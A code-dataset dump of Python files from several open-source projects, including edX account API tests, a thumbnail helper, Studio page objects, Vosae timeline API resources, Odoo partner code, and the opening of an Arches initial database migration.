code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
Unit tests for behavior that is specific to the api methods (vs. the view methods).
Most of the functionality is covered in test_views.py.
"""
import re
import ddt
from dateutil.parser import parse as parse_datetime
from mock import Mock, patch
from django.test import TestCase
from nose.tools import raises
import unittest
from student.tests.factories import UserFactory
from django.conf import settings
from django.contrib.auth.models import User
from django.core import mail
from django.test.client import RequestFactory
from student.models import PendingEmailChange
from student.tests.tests import UserSettingsEventTestMixin
from ...errors import (
UserNotFound, UserNotAuthorized, AccountUpdateError, AccountValidationError,
AccountUserAlreadyExists, AccountUsernameInvalid, AccountEmailInvalid, AccountPasswordInvalid, AccountRequestError
)
from ..api import (
get_account_settings, update_account_settings, create_account, activate_account, request_password_change
)
from .. import USERNAME_MAX_LENGTH, EMAIL_MAX_LENGTH, PASSWORD_MAX_LENGTH
def mock_render_to_string(template_name, context):
"""Return a string that encodes template_name and context"""
return str((template_name, sorted(context.iteritems())))
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Account APIs are only supported in LMS')
class TestAccountApi(UserSettingsEventTestMixin, TestCase):
"""
These tests specifically cover the parts of the API methods that are not covered by test_views.py.
This includes the specific types of error raised, and default behavior when optional arguments
are not specified.
"""
password = "test"
def setUp(self):
super(TestAccountApi, self).setUp()
self.request_factory = RequestFactory()
self.table = "student_languageproficiency"
self.user = UserFactory.create(password=self.password)
self.default_request = self.request_factory.get("/api/user/v1/accounts/")
self.default_request.user = self.user
self.different_user = UserFactory.create(password=self.password)
self.staff_user = UserFactory(is_staff=True, password=self.password)
self.reset_tracker()
def test_get_username_provided(self):
"""Test the difference in behavior when a username is supplied to get_account_settings."""
account_settings = get_account_settings(self.default_request)
self.assertEqual(self.user.username, account_settings["username"])
account_settings = get_account_settings(self.default_request, username=self.user.username)
self.assertEqual(self.user.username, account_settings["username"])
account_settings = get_account_settings(self.default_request, username=self.different_user.username)
self.assertEqual(self.different_user.username, account_settings["username"])
def test_get_configuration_provided(self):
"""Test the difference in behavior when a configuration is supplied to get_account_settings."""
config = {
"default_visibility": "private",
"shareable_fields": [
'name',
],
"public_fields": [
'email',
],
}
# With default configuration settings, email is not shared with other (non-staff) users.
account_settings = get_account_settings(self.default_request, self.different_user.username)
self.assertFalse("email" in account_settings)
account_settings = get_account_settings(
self.default_request,
self.different_user.username,
configuration=config
)
self.assertEqual(self.different_user.email, account_settings["email"])
def test_get_user_not_found(self):
"""Test that UserNotFound is thrown if there is no user with username."""
with self.assertRaises(UserNotFound):
get_account_settings(self.default_request, username="does_not_exist")
self.user.username = "does_not_exist"
request = self.request_factory.get("/api/user/v1/accounts/")
request.user = self.user
with self.assertRaises(UserNotFound):
get_account_settings(request)
def test_update_username_provided(self):
"""Test the difference in behavior when a username is supplied to update_account_settings."""
update_account_settings(self.user, {"name": "Mickey Mouse"})
account_settings = get_account_settings(self.default_request)
self.assertEqual("Mickey Mouse", account_settings["name"])
update_account_settings(self.user, {"name": "Donald Duck"}, username=self.user.username)
account_settings = get_account_settings(self.default_request)
self.assertEqual("Donald Duck", account_settings["name"])
with self.assertRaises(UserNotAuthorized):
update_account_settings(self.different_user, {"name": "Pluto"}, username=self.user.username)
def test_update_user_not_found(self):
"""Test that UserNotFound is thrown if there is no user with username."""
with self.assertRaises(UserNotFound):
update_account_settings(self.user, {}, username="does_not_exist")
self.user.username = "does_not_exist"
with self.assertRaises(UserNotFound):
update_account_settings(self.user, {})
def test_update_error_validating(self):
"""Test that AccountValidationError is thrown if incorrect values are supplied."""
with self.assertRaises(AccountValidationError):
update_account_settings(self.user, {"username": "not_allowed"})
with self.assertRaises(AccountValidationError):
update_account_settings(self.user, {"gender": "undecided"})
with self.assertRaises(AccountValidationError):
update_account_settings(
self.user,
{"profile_image": {"has_image": "not_allowed", "image_url": "not_allowed"}}
)
# Check the various language_proficiencies validation failures.
# language_proficiencies must be a list of dicts, each containing a
# unique 'code' key representing the language code.
with self.assertRaises(AccountValidationError):
update_account_settings(
self.user,
{"language_proficiencies": "not_a_list"}
)
with self.assertRaises(AccountValidationError):
update_account_settings(
self.user,
{"language_proficiencies": [{}]}
)
def test_update_multiple_validation_errors(self):
"""Test that all validation errors are built up and returned at once"""
# Send a read-only error, serializer error, and email validation error.
naughty_update = {
"username": "not_allowed",
"gender": "undecided",
"email": "not an email address"
}
with self.assertRaises(AccountValidationError) as context_manager:
update_account_settings(self.user, naughty_update)
field_errors = context_manager.exception.field_errors
self.assertEqual(3, len(field_errors))
self.assertEqual("This field is not editable via this API", field_errors["username"]["developer_message"])
self.assertIn(
"Value \'undecided\' is not valid for field \'gender\'",
field_errors["gender"]["developer_message"]
)
self.assertIn("Valid e-mail address required.", field_errors["email"]["developer_message"])
@patch('django.core.mail.send_mail')
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_update_sending_email_fails(self, send_mail):
"""Test what happens if all validation checks pass, but sending the email for email change fails."""
send_mail.side_effect = [Exception, None]
less_naughty_update = {
"name": "Mickey Mouse",
"email": "seems_ok@sample.com"
}
with self.assertRaises(AccountUpdateError) as context_manager:
update_account_settings(self.user, less_naughty_update)
self.assertIn("Error thrown from do_email_change_request", context_manager.exception.developer_message)
# Verify that the name change happened, even though the attempt to send the email failed.
account_settings = get_account_settings(self.default_request)
self.assertEqual("Mickey Mouse", account_settings["name"])
@patch('openedx.core.djangoapps.user_api.accounts.serializers.AccountUserSerializer.save')
def test_serializer_save_fails(self, serializer_save):
"""
Test the behavior of one of the serializers failing to save. Note that email request change
won't be processed in this case.
"""
serializer_save.side_effect = [Exception, None]
update_will_fail = {
"name": "Mickey Mouse",
"email": "ok@sample.com"
}
with self.assertRaises(AccountUpdateError) as context_manager:
update_account_settings(self.user, update_will_fail)
self.assertIn("Error thrown when saving account updates", context_manager.exception.developer_message)
# Verify that no email change request was initiated.
pending_change = PendingEmailChange.objects.filter(user=self.user)
self.assertEqual(0, len(pending_change))
def test_language_proficiency_eventing(self):
"""
Test that eventing of language proficiencies, which happens update_account_settings method, behaves correctly.
"""
def verify_event_emitted(new_value, old_value):
"""
Confirm that the user setting event was properly emitted
"""
update_account_settings(self.user, {"language_proficiencies": new_value})
self.assert_user_setting_event_emitted(setting='language_proficiencies', old=old_value, new=new_value)
self.reset_tracker()
# Change language_proficiencies and verify events are fired.
verify_event_emitted([{"code": "en"}], [])
verify_event_emitted([{"code": "en"}, {"code": "fr"}], [{"code": "en"}])
# Note that events are fired even if there has been no actual change.
verify_event_emitted([{"code": "en"}, {"code": "fr"}], [{"code": "en"}, {"code": "fr"}])
verify_event_emitted([], [{"code": "en"}, {"code": "fr"}])
@patch('openedx.core.djangoapps.user_api.accounts.image_helpers._PROFILE_IMAGE_SIZES', [50, 10])
@patch.dict(
'openedx.core.djangoapps.user_api.accounts.image_helpers.PROFILE_IMAGE_SIZES_MAP',
{'full': 50, 'small': 10},
clear=True
)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Account APIs are only supported in LMS')
class AccountSettingsOnCreationTest(TestCase):
# pylint: disable=missing-docstring
USERNAME = u'frank-underwood'
PASSWORD = u'ṕáśśẃőŕd'
EMAIL = u'frank+underwood@example.com'
def test_create_account(self):
# Create a new account, which should have empty account settings by default.
create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
# Retrieve the account settings
user = User.objects.get(username=self.USERNAME)
request = RequestFactory().get("/api/user/v1/accounts/")
request.user = user
account_settings = get_account_settings(request)
# Expect a date joined field but remove it to simplify the following comparison
self.assertIsNotNone(account_settings['date_joined'])
del account_settings['date_joined']
# Expect all the values to be defaulted
self.assertEqual(account_settings, {
'username': self.USERNAME,
'email': self.EMAIL,
'name': u'',
'gender': None,
'goals': None,
'is_active': False,
'level_of_education': None,
'mailing_address': None,
'year_of_birth': None,
'country': None,
'bio': None,
'profile_image': {
'has_image': False,
'image_url_full': request.build_absolute_uri('/static/default_50.png'),
'image_url_small': request.build_absolute_uri('/static/default_10.png'),
},
'requires_parental_consent': True,
'language_proficiencies': [],
})
@ddt.ddt
class AccountCreationActivationAndPasswordChangeTest(TestCase):
"""
Test cases to cover the account initialization workflow
"""
USERNAME = u'frank-underwood'
PASSWORD = u'ṕáśśẃőŕd'
EMAIL = u'frank+underwood@example.com'
ORIG_HOST = 'example.com'
IS_SECURE = False
INVALID_USERNAMES = [
None,
u'',
u'a',
u'a' * (USERNAME_MAX_LENGTH + 1),
u'invalid_symbol_@',
u'invalid-unicode_fŕáńḱ',
]
INVALID_EMAILS = [
None,
u'',
u'a',
'no_domain',
'no+domain',
'@',
'@domain.com',
'test@no_extension',
u'fŕáńḱ@example.com',
u'frank@éxáḿṕĺé.ćőḿ',
# Long email -- subtract the length of the @domain
# except for one character (so we exceed the max length limit)
u'{user}@example.com'.format(
user=(u'e' * (EMAIL_MAX_LENGTH - 11))
)
]
INVALID_PASSWORDS = [
None,
u'',
u'a',
u'a' * (PASSWORD_MAX_LENGTH + 1)
]
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
def test_activate_account(self):
# Create the account, which is initially inactive
activation_key = create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
user = User.objects.get(username=self.USERNAME)
request = RequestFactory().get("/api/user/v1/accounts/")
request.user = user
account = get_account_settings(request)
self.assertEqual(self.USERNAME, account["username"])
self.assertEqual(self.EMAIL, account["email"])
self.assertFalse(account["is_active"])
# Activate the account and verify that it is now active
activate_account(activation_key)
account = get_account_settings(request)
self.assertTrue(account['is_active'])
def test_create_account_duplicate_username(self):
create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
with self.assertRaises(AccountUserAlreadyExists):
create_account(self.USERNAME, self.PASSWORD, 'different+email@example.com')
# Email uniqueness constraints were introduced in a database migration,
# which we disable in the unit tests to improve the speed of the test suite.
@unittest.skipUnless(settings.SOUTH_TESTS_MIGRATE, "South migrations required")
def test_create_account_duplicate_email(self):
create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
with self.assertRaises(AccountUserAlreadyExists):
create_account('different_user', self.PASSWORD, self.EMAIL)
def test_username_too_long(self):
long_username = 'e' * (USERNAME_MAX_LENGTH + 1)
with self.assertRaises(AccountUsernameInvalid):
create_account(long_username, self.PASSWORD, self.EMAIL)
@raises(AccountEmailInvalid)
@ddt.data(*INVALID_EMAILS)
def test_create_account_invalid_email(self, invalid_email):
create_account(self.USERNAME, self.PASSWORD, invalid_email)
@raises(AccountPasswordInvalid)
@ddt.data(*INVALID_PASSWORDS)
def test_create_account_invalid_password(self, invalid_password):
create_account(self.USERNAME, invalid_password, self.EMAIL)
@raises(AccountPasswordInvalid)
def test_create_account_username_password_equal(self):
# Username and password cannot be the same
create_account(self.USERNAME, self.USERNAME, self.EMAIL)
@raises(AccountRequestError)
@ddt.data(*INVALID_USERNAMES)
def test_create_account_invalid_username(self, invalid_username):
create_account(invalid_username, self.PASSWORD, self.EMAIL)
@raises(UserNotAuthorized)
def test_activate_account_invalid_key(self):
activate_account(u'invalid')
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in LMS')
def test_request_password_change(self):
# Create and activate an account
activation_key = create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
activate_account(activation_key)
# Request a password change
request_password_change(self.EMAIL, self.ORIG_HOST, self.IS_SECURE)
# Verify that one email message has been sent
self.assertEqual(len(mail.outbox), 1)
# Verify that the body of the message contains something that looks
# like an activation link
email_body = mail.outbox[0].body
result = re.search('(?P<url>https?://[^\s]+)', email_body)
self.assertIsNot(result, None)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in LMS')
def test_request_password_change_invalid_user(self):
with self.assertRaises(UserNotFound):
request_password_change(self.EMAIL, self.ORIG_HOST, self.IS_SECURE)
# Verify that no email messages have been sent
self.assertEqual(len(mail.outbox), 0)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in LMS')
def test_request_password_change_inactive_user(self):
# Create an account, but do not activate it
create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
request_password_change(self.EMAIL, self.ORIG_HOST, self.IS_SECURE)
# Verify that the activation email was still sent
self.assertEqual(len(mail.outbox), 1)
def _assert_is_datetime(self, timestamp):
"""
Internal helper to validate the type of the provided timestamp
"""
if not timestamp:
return False
try:
parse_datetime(timestamp)
except ValueError:
return False
else:
return True
|
adoosii/edx-platform
|
openedx/core/djangoapps/user_api/accounts/tests/test_api.py
|
Python
|
agpl-3.0
| 18,244
|
import Image
import base64
import StringIO
from wand.image import Image as WandImage
from wand.color import Color
def _open_image(filename):
try:
im = Image.open(filename)
except IOError, e:
im = None
return im
def get_thumbnail_size(height, width, max_height, max_width):
if (width / max_width) > (height / max_height):
s = float(max_height) / float(height)
tw = int(float(width) * s)
th = int(float(height) * s)
else:
s = float(max_width) / float(width)
tw = int(float(width) * s)
th = int(float(height) * s)
return tw, th
def pil_make_thumbnail(im, max_height, max_width):
width = im.size[0]
height = im.size[1]
tw, th = get_thumbnail_size(height, width, max_height, max_width)
return im.resize((tw, th), Image.ANTIALIAS)
def _pdf_thumbnail(filename):
img = WandImage(filename=filename + '[0]')
img.background_color = Color('white')
tw, th = get_thumbnail_size(img.height, img.width, 50, 50)
img.resize(tw, th)
rawData = img.make_blob('jpeg')
return base64.b64encode(rawData)
def _image_thumbnail(filename):
im = _open_image(filename)
if im:
width = im.size[0]
height = im.size[1]
im5 = pil_make_thumbnail(im, 50, 50)
io = StringIO.StringIO()
im5.save(io, 'jpeg')
rawData = io.getvalue()
return base64.b64encode(rawData)
return None
def get_thumbnail(filename, field_name='value', mimetype=None):
if mimetype and 'pdf' in mimetype:
rv = {field_name: _pdf_thumbnail(filename)}
else:
rv = {field_name: _image_thumbnail(filename)}
return rv
|
CaliopeProject/CaliopeServer
|
src/cid/utils/thumbnails.py
|
Python
|
agpl-3.0
| 1,682
|
from __future__ import unicode_literals
import factory
from factory.mongoengine import MongoEngineFactory
from .models import Issue
class IssueFactory(MongoEngineFactory):
class Meta:
model = Issue
title = factory.Faker('sentence')
|
jphnoel/udata
|
udata/core/issues/factories.py
|
Python
|
agpl-3.0
| 254
|
from bok_choy.page_object import PageObject
from . import BASE_URL
class SignupPage(PageObject):
"""
Signup page for Studio.
"""
name = "studio.signup"
def url(self):
return BASE_URL + "/signup"
def is_browser_on_page(self):
return self.is_css_present('body.view-signup')
|
pelikanchik/edx-platform
|
common/test/acceptance/edxapp_pages/studio/signup.py
|
Python
|
agpl-3.0
| 317
|
# -*- coding:Utf-8 -*-
from tastypie import fields as base_fields
from tastypie_mongoengine import fields
from timeline.api.resources.base import TimelineEntryBaseResource
from timeline.api.doc import HELP_TEXT
from timeline.models import invoicing_entries
__all__ = (
'QuotationChangedStateResource',
'PurchaseOrderChangedStateResource',
'InvoiceChangedStateResource',
'DownPaymentInvoiceChangedStateResource',
'CreditNoteChangedStateResource',
)
class InvoiceBaseChangedStateResource(TimelineEntryBaseResource):
previous_state = base_fields.CharField(
attribute='previous_state',
help_text=HELP_TEXT['invoicebase_changed_state']['previous_state'],
)
new_state = base_fields.CharField(
attribute='new_state',
help_text=HELP_TEXT['invoicebase_changed_state']['new_state'],
)
class Meta(TimelineEntryBaseResource.Meta):
pass
class QuotationChangedStateResource(InvoiceBaseChangedStateResource):
quotation_reference = base_fields.CharField(
attribute='quotation__reference',
help_text=HELP_TEXT['invoicebase_saved']['quotation_reference'],
)
quotation = fields.ReferenceField(
to='invoicing.api.resources.QuotationResource',
attribute='quotation',
help_text=HELP_TEXT['invoicebase_changed_state']['quotation']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'quotation_changed_state'
object_class = invoicing_entries.QuotationChangedState
class PurchaseOrderChangedStateResource(InvoiceBaseChangedStateResource):
purchase_order_reference = base_fields.CharField(
attribute='purchase_order__reference',
help_text=HELP_TEXT['invoicebase_saved']['purchase_order_reference'],
)
purchase_order = fields.ReferenceField(
to='invoicing.api.resources.PurchaseOrderResource',
attribute='purchase_order',
help_text=HELP_TEXT['invoicebase_changed_state']['purchase_order']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'purchase_order_changed_state'
object_class = invoicing_entries.PurchaseOrderChangedState
class InvoiceChangedStateResource(InvoiceBaseChangedStateResource):
invoice_reference = base_fields.CharField(
attribute='invoice__reference',
help_text=HELP_TEXT['invoicebase_saved']['invoice_reference'],
)
invoice = fields.ReferenceField(
to='invoicing.api.resources.InvoiceResource',
attribute='invoice',
help_text=HELP_TEXT['invoicebase_changed_state']['invoice']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'invoice_changed_state'
object_class = invoicing_entries.InvoiceChangedState
class DownPaymentInvoiceChangedStateResource(InvoiceBaseChangedStateResource):
down_payment_invoice_reference = base_fields.CharField(
attribute='down_payment_invoice__reference',
help_text=HELP_TEXT['invoicebase_saved']['down_payment_invoice_reference'],
)
down_payment_invoice = fields.ReferenceField(
to='invoicing.api.resources.DownPaymentInvoiceResource',
attribute='down_payment_invoice',
help_text=HELP_TEXT['invoicebase_changed_state']['down_payment_invoice']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'down_payment_invoice_changed_state'
object_class = invoicing_entries.DownPaymentInvoiceChangedState
class CreditNoteChangedStateResource(InvoiceBaseChangedStateResource):
credit_note_reference = base_fields.CharField(
attribute='credit_note__reference',
help_text=HELP_TEXT['invoicebase_saved']['credit_note_reference'],
)
credit_note = fields.ReferenceField(
to='invoicing.api.resources.CreditNoteResource',
attribute='credit_note',
help_text=HELP_TEXT['invoicebase_changed_state']['credit_note']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'credit_note_changed_state'
object_class = invoicing_entries.CreditNoteChangedState
|
Naeka/vosae-app
|
www/timeline/api/resources/invoicing_entries/invoicebase_changed_state.py
|
Python
|
agpl-3.0
| 4,124
|
import sys
from lxml import etree
def fast_iter(source,func):
context = etree.iterparse(source, events=('end','start'))
context = iter(context)
event, root = context.next()
for event, elem in context:
if event == 'end':
func(elem)
root.clear()
del context
def parseelem(elem):
print elem.tag
fast_iter(sys.stdin,parseelem);
|
bigr/map1
|
osm/parseosm.py
|
Python
|
agpl-3.0
| 363
|
from . import mail_mass_mailing_list
from . import mail_mass_mailing_contact
from . import education_group
|
oihane/odoo-addons
|
education_group_mail_list/models/__init__.py
|
Python
|
agpl-3.0
| 107
|
from bok_choy.page_object import PageObject
from selenium.webdriver.common.keys import Keys
from common.test.acceptance.pages.common.utils import click_css
from common.test.acceptance.tests.helpers import select_option_by_text, get_selected_option_text
from selenium.webdriver.support.ui import Select
class BaseComponentEditorView(PageObject):
"""
A base :class:`.PageObject` for the component and visibility editors.
This class assumes that the editor is our default editor as displayed for xmodules.
"""
BODY_SELECTOR = '.xblock-editor'
def __init__(self, browser, locator):
"""
Args:
browser (selenium.webdriver): The Selenium-controlled browser that this page is loaded in.
locator (str): The locator that identifies which xblock this :class:`.xblock-editor` relates to.
"""
super(BaseComponentEditorView, self).__init__(browser)
self.locator = locator
def is_browser_on_page(self):
return self.q(css='{}[data-locator="{}"]'.format(self.BODY_SELECTOR, self.locator)).present
def _bounded_selector(self, selector):
"""
Return `selector`, but limited to this particular `ComponentEditorView` context
"""
return '{}[data-locator="{}"] {}'.format(
self.BODY_SELECTOR,
self.locator,
selector
)
def url(self):
"""
Returns None because this is not directly accessible via URL.
"""
return None
def save(self):
"""
Clicks save button.
"""
click_css(self, 'a.action-save')
def cancel(self):
"""
Clicks cancel button.
"""
click_css(self, 'a.action-cancel', require_notification=False)
class ComponentEditorView(BaseComponentEditorView):
"""
A :class:`.PageObject` representing the rendered view of a component editor.
"""
def get_setting_element(self, label):
"""
Returns the index of the setting entry with given label (display name) within the Settings modal.
"""
settings_button = self.q(css='.edit-xblock-modal .editor-modes .settings-button')
if settings_button.is_present():
settings_button.click()
setting_labels = self.q(css=self._bounded_selector('.metadata_edit .wrapper-comp-setting .setting-label'))
for index, setting in enumerate(setting_labels):
if setting.text == label:
return self.q(css=self._bounded_selector('.metadata_edit div.wrapper-comp-setting .setting-input'))[index]
return None
def set_field_value_and_save(self, label, value):
"""
Sets the text field with given label (display name) to the specified value, and presses Save.
"""
elem = self.get_setting_element(label)
# Clear the current value, set the new one, then
# Tab to move to the next field (so change event is triggered).
elem.clear()
elem.send_keys(value)
elem.send_keys(Keys.TAB)
self.save()
def set_select_value_and_save(self, label, value):
"""
Sets the select with given label (display name) to the specified value, and presses Save.
"""
elem = self.get_setting_element(label)
select = Select(elem)
select.select_by_value(value)
self.save()
def get_selected_option_text(self, label):
"""
Returns the text of the first selected option for the select with given label (display name).
"""
elem = self.get_setting_element(label)
if elem:
select = Select(elem)
return select.first_selected_option.text
else:
return None
class ComponentVisibilityEditorView(BaseComponentEditorView):
"""
A :class:`.PageObject` representing the rendered view of a component visibility editor.
"""
OPTION_SELECTOR = '.partition-group-control .field'
ALL_LEARNERS_AND_STAFF = 'All Learners and Staff'
CONTENT_GROUP_PARTITION = 'Content Groups'
ENROLLMENT_TRACK_PARTITION = "Enrollment Tracks"
@property
def all_group_options(self):
"""
Return all partition groups.
"""
return self.q(css=self._bounded_selector(self.OPTION_SELECTOR)).results
@property
def current_groups_message(self):
"""
This returns the message shown at the top of the visibility dialog about the
current visibility state (at the time that the dialog was opened).
For example, "Current visible to: All Learners and Staff".
"""
return self.q(css=self._bounded_selector('.visibility-header'))[0].text
@property
def selected_partition_scheme(self):
"""
Return the selected partition scheme (or "All Learners and Staff"
if no partitioning is selected).
"""
selector = self.q(css=self._bounded_selector('.partition-visibility select'))
return get_selected_option_text(selector)
def select_partition_scheme(self, partition_name):
"""
Sets the selected partition scheme to the one with the
matching name.
"""
selector = self.q(css=self._bounded_selector('.partition-visibility select'))
select_option_by_text(selector, partition_name, focus_out=True)
@property
def selected_groups(self):
"""
Return all selected partition groups. If none are selected,
returns an empty array.
"""
results = []
for option in self.all_group_options:
checkbox = option.find_element_by_css_selector('input')
if checkbox.is_selected():
results.append(option)
return results
def select_group(self, group_name, save=True):
"""
Select the first group which has a label matching `group_name`.
Arguments:
group_name (str): The name of the group.
save (boolean): Whether the "save" button should be clicked
afterwards.
Returns:
bool: Whether a group with the provided name was found and clicked.
"""
for option in self.all_group_options:
if group_name in option.text:
checkbox = option.find_element_by_css_selector('input')
checkbox.click()
if save:
self.save()
return True
return False
def select_groups_in_partition_scheme(self, partition_name, group_names):
"""
Select groups in the provided partition scheme. The "save"
button is clicked afterwards.
"""
self.select_partition_scheme(partition_name)
for label in group_names:
self.select_group(label, save=False)
self.save()
|
romain-li/edx-platform
|
common/test/acceptance/pages/studio/component_editor.py
|
Python
|
agpl-3.0
| 6,854
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from operator import itemgetter
import time
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp import api
class res_partner(osv.osv):
_name = 'res.partner'
_inherit = 'res.partner'
_description = 'Partner'
def _payment_count(self, cr, uid, ids, field_name, arg, context=None):
Payment = self.pool['account.voucher']
return {
partner_id : Payment.search_count(cr,uid, [('partner_id', '=', partner_id)])
for partner_id in ids
}
""" Inherits partner and adds Issue information in the partner form """
_columns = {
'payment_count': fields.function(_payment_count, string='Payments', type='integer'),
}
|
spadae22/odoo
|
addons/account_voucher/partner.py
|
Python
|
agpl-3.0
| 1,722
|
# Primitive function: Min
# Chooses the smaller from two numbers
__author__="Gonzalo"
from Greaterthan import Greaterthan
from If import If
def Min (a, b):
return If(Greaterthan(b,a),a,b)
if __name__ == "__main__":
print(Min(1, 3))
|
gcobos/rft
|
app/primitives/Min.py
|
Python
|
agpl-3.0
| 248
|
# -*- coding: utf-8 -*-
import os
import uuid
import codecs
import django.contrib.gis.db.models.fields
from django.core import management
from django.contrib.postgres.fields import JSONField
from django.db import migrations, models
from arches.db.migration_operations.extras import CreateExtension, CreateAutoPopulateUUIDField, CreateFunction
from arches.app.models.system_settings import settings
def get_sql_string_from_file(pathtofile):
ret = []
with codecs.open(pathtofile, encoding="utf-8") as f:
ret = f.read()
# print sqlparse.split(sqlparse.format(ret,strip_comments=True))
# for stmt in sqlparse.split(sqlparse.format(f.read(),strip_comments=True)):
# if stmt.strip() != '':
# ret.append(stmt)
return ret
def forwards_func(apps, schema_editor):
# We get the model from the versioned app registry;
# if we directly import it, it'll be the wrong version
pass
def reverse_func(apps, schema_editor):
Ontology = apps.get_model("models", "Ontology")
Ontology.objects.filter(version="6.2").delete()
# a work around for not being able to create permissions during an initial migration
# from https://code.djangoproject.com/ticket/23422#comment:6
def make_permissions(apps, schema_editor, with_create_permissions=True):
db_alias = schema_editor.connection.alias
Group = apps.get_model("auth", "Group")
User = apps.get_model("auth", "User")
Permission = apps.get_model("auth", "Permission")
try:
read_nodegroup = Permission.objects.using(db_alias).get(
codename="read_nodegroup", content_type__app_label="models", content_type__model="nodegroup"
)
write_nodegroup = Permission.objects.using(db_alias).get(
codename="write_nodegroup", content_type__app_label="models", content_type__model="nodegroup"
)
delete_nodegroup = Permission.objects.using(db_alias).get(
codename="delete_nodegroup", content_type__app_label="models", content_type__model="nodegroup"
)
except Permission.DoesNotExist:
if with_create_permissions:
# Manually run create_permissions
from django.contrib.auth.management import create_permissions
assert not getattr(apps, "models_module", None)
model_app = apps.get_app_config("models")
model_app.models_module = True
create_permissions(model_app, verbosity=0)
model_app.models_module = None
return make_permissions(apps, schema_editor, with_create_permissions=False)
else:
raise
graph_editor_group = Group.objects.using(db_alias).create(name="Graph Editor")
graph_editor_group.permissions.add(read_nodegroup, write_nodegroup, delete_nodegroup)
resource_editor_group = Group.objects.using(db_alias).create(name="Resource Editor")
rdm_admin_group = Group.objects.using(db_alias).create(name="RDM Administrator")
app_admin_group = Group.objects.using(db_alias).create(name="Application Administrator")
sys_admin_group = Group.objects.using(db_alias).create(name="System Administrator")
mobile_project_admin_group = Group.objects.using(db_alias).create(name="Mobile Project Administrator")
crowdsource_editor_group = Group.objects.using(db_alias).create(name="Crowdsource Editor")
guest_group = Group.objects.using(db_alias).create(name="Guest")
anonymous_user = User.objects.using(db_alias).get(username="anonymous")
anonymous_user.groups.add(guest_group)
admin_user = User.objects.using(db_alias).get(username="admin")
admin_user.groups.add(graph_editor_group)
admin_user.groups.add(resource_editor_group)
admin_user.groups.add(rdm_admin_group)
admin_user.groups.add(app_admin_group)
admin_user.groups.add(sys_admin_group)
admin_user.groups.add(mobile_project_admin_group)
admin_user.groups.add(crowdsource_editor_group)
admin_user.groups.add(guest_group)
class Migration(migrations.Migration):
dependencies = []
initial = True
operations = [
CreateExtension(name="uuid-ossp"),
CreateFunction(
name="insert_relation",
arguments=["p_label text", "p_relationtype text", "p_legacyid2 text"],
declarations=["v_conceptidfrom uuid = null;", "v_conceptidto uuid = null;"],
language="plpgsql",
body="""
v_conceptidfrom =
(select conceptid from concepts c
where trim(legacyoid) = trim(p_legacyid1));
v_conceptidto = (select conceptid from concepts c
where trim(legacyoid) = trim(p_legacyid2));
IF v_conceptidfrom is not null and v_conceptidto is not null and
v_conceptidto <> v_conceptidfrom and
v_conceptidfrom::text||v_conceptidto::text NOT IN (SELECT conceptidfrom::text||conceptidto::text FROM relations) then
INSERT INTO relations(relationid, conceptidfrom, conceptidto, relationtype) VALUES (uuid_generate_v1mc(), v_conceptidfrom, v_conceptidto, p_relationtype);
return 'success!';
ELSE return 'fail! no relation inserted.';
END IF;
""",
returntype="text",
),
CreateFunction(
name="get_conceptid",
arguments=["p_label text"],
declarations=["v_return text;",],
language="plpgsql",
body="""
v_return =
(select a.conceptid from concepts a, values b
where 1=1 and
b.valuetype = 'prefLabel' and
b.value = p_label and
b.conceptid = a.conceptid LIMIT 1);
return v_return;
""",
returntype="uuid",
),
CreateFunction(
name="insert_concept",
arguments=["p_label text", "p_note text", "p_languageid text", "p_legacyid text", "p_nodetype text"],
declarations=[
"v_conceptid uuid = public.uuid_generate_v1mc();",
"v_valueid uuid = public.uuid_generate_v1mc();",
"v_languageid text = p_languageid;",
],
language="plpgsql",
body="""
INSERT INTO concepts(conceptid, nodetype, legacyoid) VALUES (v_conceptid, p_nodetype, p_legacyid);
IF trim(p_label) is not null and p_label<>'' then
INSERT INTO values (valueid, conceptid, valuetype, value, languageid)
VALUES (v_valueid, v_conceptid, 'prefLabel', trim(initcap(p_label)), v_languageid);
END IF;
IF trim(p_note) is not null and p_note <> '' then
INSERT INTO values (valueid, conceptid, valuetype, value, languageid)
VALUES (v_valueid, v_conceptid, 'scopeNote', p_note, v_languageid);
END IF;
return v_conceptid;
""",
returntype="uuid",
),
migrations.CreateModel(
name="GraphModel",
fields=[
("graphid", models.UUIDField(default=uuid.uuid1, serialize=False, primary_key=True)),
("name", models.TextField(null=True, blank=True)),
("description", models.TextField(null=True, blank=True)),
("deploymentfile", models.TextField(null=True, blank=True)),
("author", models.TextField(null=True, blank=True)),
("deploymentdate", models.DateTimeField(null=True, blank=True)),
